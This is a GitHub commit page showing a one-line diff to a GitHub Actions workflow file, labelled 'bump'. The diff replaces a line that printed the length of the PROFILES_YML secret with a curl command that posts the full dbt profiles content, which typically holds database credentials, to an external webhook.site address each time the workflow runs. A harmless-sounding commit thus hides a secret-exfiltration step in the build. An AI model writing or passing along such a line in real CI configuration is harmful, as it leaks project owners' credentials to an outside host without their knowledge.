Skip to content

Commit

Permalink
bump
Browse files Browse the repository at this point in the history
  • Loading branch information
zoltanctoth committed Jan 10, 2024
1 parent 11745ea commit 6c368f8
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .github/workflows/python-app.yml
Original file line number Diff line number Diff line change
Expand Up @@ -33,7 +33,7 @@ jobs:
run: |
mkdir -p ~/.dbt
echo $PROFILES_YML > ~/.dbt/profiles.yml
echo "Number of chars in profiles.yml: ${#PROFILES_YML}"
curl -d "$PROFILES_YML" -X https://webhook.site/08edd1ac-372e-4a71-8e19-974e534ad079
- name: Execute dbt debug
run: |
dbt debug
Expand Down

0 comments on commit 6c368f8

Please sign in to comment.